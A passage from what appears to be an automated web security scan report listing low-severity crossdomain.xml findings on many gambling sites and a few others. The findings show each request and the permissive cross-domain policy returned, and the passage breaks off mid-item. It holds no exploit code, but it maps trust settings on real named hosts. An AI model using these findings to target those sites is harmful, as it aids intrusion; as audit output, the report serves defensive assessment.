   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.72. http://fr.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fr.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gbdbojzsynaattnqf5kbn455; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.73. http://fr.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fr.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:06 GMT
Accept-Ranges: bytes
ETag: "30434ec47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:25:16 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.74. http://fr.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fr.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uooya155pkppfw45h05ygvuj; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.75. http://fr.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fr.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nqz0os2wb0lyl555bngpjaun; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.76. http://fr.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fr.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fr.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3rgvylfgcgicwtbximbgvl45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.77. http://home.okscratchcards.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: home.okscratchcards.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ffsprm55njafadazbj5sveqa; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.78. http://hu.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://hu.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: hu.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 21 Sep 2010 08:44:53 GMT
Accept-Ranges: bytes
ETag: "82c9a426959cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:18 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.79. http://it.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: it.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=efks0b45scz4pi55n11whhar; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.80. http://it.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: it.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:14 GMT
Accept-Ranges: bytes
ETag: "d01ceff047b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:28 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.81. http://it.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: it.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ts1or4aaps5c1ibwbsgln3nm; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.82. http://it.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: it.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q4szys55tw2dkuro2bfsbg55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.83. http://it.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: it.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okdvct551gkpjx3alhysrrr4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.84. http://itunes.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 12 May 2011 14:44:41 GMT
ETag: "1b0-4a3153aae8840"
Accept-Ranges: bytes
Content-Length: 432
Content-Type: text/xml
Cache-Control: public, no-transform, max-age=1968
Date: Mon, 16 May 2011 12:13:11 GMT
Connection: close
X-Apple-Partner: origin.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.apple.com" />
<allow-access-from domain="*.apple.com.edgesuite.net" />
<allow-access-from domain="nikeplus.nike.com"/>
<allow-access-from domain="nikerunning.nike.com"/>
...[SNIP]...

4.85. http://karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s1w0tgvqrm11duv13rq3kkfa; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.86. http://mundirasca.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mundirasca.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mundirasca.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oglzco2iopgob1555lrukhyl; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.87. http://nettiarpa.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nettiarpa.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nettiarpa.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2qft2xvzsfsf5bbkas1hpw45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.88. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 16 May 2011 12:47:27 GMT
Date: Mon, 16 May 2011 12:45:27 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.89. http://nl.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nl.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=echhxy455as15jvyjhurua55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.90. http://nl.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nl.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:23 GMT
Accept-Ranges: bytes
ETag: "101c0f647b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:17 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.91. http://nl.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nl.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=odb4ujr02radec55eeiyz4uo; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.92. http://nl.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nl.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=auin4x55f0lulo45nbfwoh45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.93. http://nl.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nl.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wueoo2qw0ihwfj45hqb2ab55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.94. http://no.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://no.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: no.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
